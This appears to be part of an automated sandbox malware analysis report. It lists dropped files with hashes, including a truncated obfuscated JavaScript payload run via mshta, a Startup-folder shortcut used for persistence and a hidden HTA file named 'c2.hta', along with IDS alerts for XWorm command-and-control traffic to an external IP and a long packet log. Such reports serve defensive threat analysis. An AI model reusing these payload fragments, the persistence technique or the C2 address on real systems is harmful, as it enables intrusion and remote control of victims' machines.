Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@..................................(....@.................................4........@...o..............h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....o...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp.js

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with very long lines (3307), with no line terminators
Category:	dropped
Size (bytes):	3307
Entropy (8bit):	5.798639475646749
Encrypted:	false
SSDEEP:	48:LcX5oACw2LCeugnjpENEi1sTEliazvwUtUs6K7n+pCJ6H/2jNUfv4UcjK9lt9Jur:aQw2WexY8mzZUXKSppH/2hUf5cilq
MD5:	6E11083E345266E3117481D9B141B3B9
SHA1:	B63B6483142EF562980D7CB46EBFE9D0CAE80ECD
SHA-256:	62431A957C25A1D3E9207C350C5CBA7E04DDFA2DDD4F0DD6F0D0CF0580EE5B1E
SHA-512:	F1EF96983140C9441C4FA12E45AFC178940F38A0DDB00FCC6C871F4427518ACD788A8FC026413A7586A0F4F0C1442C8591197711FC1FE23AACF37A467FD13202
Malicious:	true
Preview:	var m=b;(function(c,d){var j=b,e=c();while(!![]){try{var f=-parseInt(j(0x1a3))/0x1(-parseInt(j(0x1b1))/0x2)+parseInt(j(0x1a1))/0x3(parseInt(j(0x1ad))/0x4)+parseInt(j(0x1aa))/0x5+-parseInt(j(0x1a5))/0x6+-parseInt(j(0x1ac))/0x7+-parseInt(j(0x19b))/0x8+-parseInt(j(0x1b3))/0x9(parseInt(j(0x1a2))/0xa);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0xc47e1));var _0xe91ad=_0x2b73;function _0x4524(){var k=b,c=[k(0x19c),k(0x1a7),'14qYAfZk',k(0x1ba),k(0x1ae),'5990904movKoa','3087036mOTiSC',k(0x1b2),k(0x1b6),k(0x1bc),k(0x19e),k(0x1a6),k(0x1b8),k(0x1b9),k(0x1a9),k(0x1af),k(0x1b4),'WScript.Shell',k(0x1b7),k(0x1a0),'231740BvWnZJ',k(0x1bb)];return _0x4524=function(){return c;},_0x4524();}(function(c,d){var l=b,e=_0x2b73,f=c();while(!![]){try{var g=parseInt(e(0xd3))/0x1+-parseInt(e(0xde))/0x2+parseInt(e(0xdb))/0x3+parseInt(e(0xca))/0x4(-parseInt(e(0xd5))/0x5)+-parseInt(e(0xd2))/0x6+parseInt(e(0xce))/0x7*(parseInt(e(0xd1))/0x8)+-parseInt(e(0xda))/0x9;if(g===d)br

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.847622824451179
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5mJ17ufLOcsaYuPA/y:HRYF5yjowkn23mf7YswIy
MD5:	E0B7B80EFEA8FEE463E17B9DFAC63CD8
SHA1:	0E67515AE0FDD6FEFE5507909217BD6B3910BF8D
SHA-256:	D2F171FDFED8A949684DF0B49832AC23CEFCBB2A58AC79C394C1C009F4B32597
SHA-512:	826DCDA1E414189F36DED4028AF8F8DEDC5926C4739E0F907295211E45163F476E0E60CF848D6503E873ACA0735D88766339E73886D3A9AA99ED2087B933532F
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" ..

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (1372), with CRLF line terminators
Entropy (8bit):	5.786382539378991
TrID:	HyperText Markup Language (12001/1) 66.65% HyperText Markup Language (6006/1) 33.35%
File name:	c2.hta
File size:	1'692 bytes
MD5:	de40615d23be7832504bc1c01202d7b9
SHA1:	557830552d122948342df79e818af09a7f9c8b1f
SHA256:	594add2b608976f962a956425ea8883c4e363b7cef956caed54c6f0f29abc999
SHA512:	555b5136da08a2cea46bcaaab141cdd42c8bc10a72dd7db1369385db3bcec32f1e5fb28220abe49e9d062dc10888759c95dc5dd506d5f6d576295df49eff994f
SSDEEP:	48:3zpqKAfZwJswuEVPC8ak18xGnr79APCol:jHsw48akOIH9ol
TLSH:	4D31344D6D60E490033363639E6E8809F551DD962511D246B219A0DEFF35332D27F78E
File Content Preview:	<html>..<head>.. <HTA:APPLICATION.. ID="SilentHTA".. APPLICATIONNAME="Hidden HTA".. WINDOWSTATE="minimize".. SHOWINTASKBAR="no".. SINGLEINSTANCE="yes".. SCROLL="no".. >.. <script type="text/javascript">..

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T18:06:22.039016+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	50021	193.26.115.21	7007	TCP
2024-12-11T18:06:34.138984+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	193.26.115.21	7007	192.168.2.4	50021	TCP
2024-12-11T18:06:34.138984+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	193.26.115.21	7007	192.168.2.4	50021	TCP
2024-12-11T18:07:04.142054+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	193.26.115.21	7007	192.168.2.4	50021	TCP
2024-12-11T18:07:04.142054+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	193.26.115.21	7007	192.168.2.4	50021	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 18:03:02.784931898 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:02.784986019 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:02.785067081 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:02.795434952 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:02.795449018 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.073560953 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.073771954 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.126226902 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.126270056 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.127374887 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.127552032 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.136419058 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.179348946 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.538527012 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.538592100 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.538707972 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.538727045 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:04.538785934 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.614902020 CET	49730	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:04.614945889 CET	443	49730	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:06.102780104 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:06.102828979 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:06.102899075 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:06.109565020 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:06.109584093 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.387794971 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.387871027 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:07.389744043 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:07.389756918 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.389966011 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.397488117 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:07.439333916 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.865040064 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.865114927 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.865236044 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:07.865252972 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:07.908914089 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.059097052 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.059134960 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.059187889 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.059214115 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.059212923 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.059250116 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.059330940 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.059591055 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.104408026 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.104464054 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.104501963 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.104512930 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.104553938 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.104553938 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.241396904 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.241462946 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.241482019 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.241497993 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.241518021 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.241540909 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.269458055 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.269505024 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.269531012 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.269540071 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.269566059 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.269578934 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.292524099 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.292570114 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.292601109 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.292608023 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.292630911 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.292646885 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.317648888 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.317691088 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.317734957 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.317758083 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.317774057 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.317800045 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.432238102 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.432305098 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.432487011 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.432487965 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.432517052 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.432564974 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.451189995 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.451236010 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.451328039 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.451340914 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.451369047 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.451379061 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.467384100 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.467398882 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.467464924 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.467477083 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.467513084 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.484270096 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.484282970 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.484366894 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.484383106 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.484431028 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.495646954 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.495661974 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.495737076 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.495748043 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.495785952 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.506275892 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.506289005 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.506370068 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.506381989 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.506424904 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.542917967 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.542932034 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.543100119 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.543109894 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.543157101 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.625809908 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.625829935 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.625906944 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.625930071 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.625976086 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.635946035 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.635962963 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.636015892 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.636034012 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.636054993 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.636073112 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.647201061 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.647213936 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.647291899 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.647300959 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.647339106 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.652002096 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.652051926 CET	443	49731	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:08.652060032 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.652091980 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:08.688766003 CET	49731	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:11.340254068 CET	49734	80	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:11.459832907 CET	80	49734	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:11.459952116 CET	49734	80	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:11.871068001 CET	49734	80	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:11.990772009 CET	80	49734	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:12.611454010 CET	80	49734	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:12.613435984 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:12.613492012 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:12.613557100 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:12.616544962 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:12.616559982 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:12.758708000 CET	49734	80	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:13.910437107 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:13.910548925 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:13.940222979 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:13.940253973 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:13.940649033 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:13.946475029 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:13.987325907 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.382710934 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.382775068 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.382930040 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.382951021 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.524950027 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.578988075 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.579076052 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.579111099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.579138994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.579191923 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.579191923 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.579204082 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.579233885 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.579262972 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.579286098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.579286098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.579305887 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.632756948 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.632781982 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.632862091 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.632869959 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.632890940 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.632937908 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.632937908 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.632953882 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.632981062 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.633029938 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.765769005 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.765837908 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.765846014 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.765866995 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.765913010 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.765913010 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.795280933 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.795356035 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.795361996 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.795387983 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.795439005 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.795439005 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.818084955 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.818133116 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.818192005 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.818192005 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.818202019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.818244934 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.879110098 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.879184008 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.879199028 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.879216909 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.879261017 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.879261017 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.958369017 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.958436966 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.958468914 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.958482027 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.958723068 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.977082968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.977132082 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.977185965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.977185965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.977193117 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.977286100 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.995893002 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.995939016 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.996001959 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.996001959 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:14.996009111 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:14.996043921 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.010390997 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.010442972 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.010492086 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.010497093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.010519028 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.010565042 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.022628069 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.022675991 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.022727013 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.022737026 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.022777081 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.022777081 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.064651966 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.064716101 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.064779043 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.064779043 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.064789057 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.064848900 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.147304058 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.147402048 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.147456884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.147465944 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.147496939 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.147521019 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.157310009 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.157377958 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.157457113 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.157457113 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.157464981 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.157506943 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.168898106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.168942928 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.168997049 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.168997049 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.169004917 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.169042110 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.180624008 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.180672884 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.180738926 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.180748940 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.180768013 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.180805922 CET	49735	443	192.168.2.4	193.26.115.21
